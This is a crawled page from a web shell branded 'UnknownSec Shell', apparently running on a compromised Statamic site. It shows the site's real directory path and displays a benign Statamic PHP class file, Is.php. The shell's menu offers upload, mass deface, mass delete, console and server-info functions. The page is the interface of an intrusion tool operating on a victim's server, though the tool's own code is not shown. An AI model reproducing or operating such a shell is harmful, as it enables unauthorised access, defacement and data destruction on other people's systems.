shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Tags
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Is.php
<?php namespace Statamic\Tags; use Statamic\Facades\User; use Statamic\Support\Arr; class Is extends Tags { /** * Maps to {{ is:[role] }}. * * @param string $method * @param array $args * @return string|void */ public function wildcard($method) { if (! $user = User::current()) { return; } $role = $method === 'index' ? $this->params->explode(['role', 'roles']) : $method; $roles = Arr::wrap($role); foreach ($roles as $role) { if ($user->hasRole($role)) { return $this->parse(); } } } }
© 2026 UnknownSec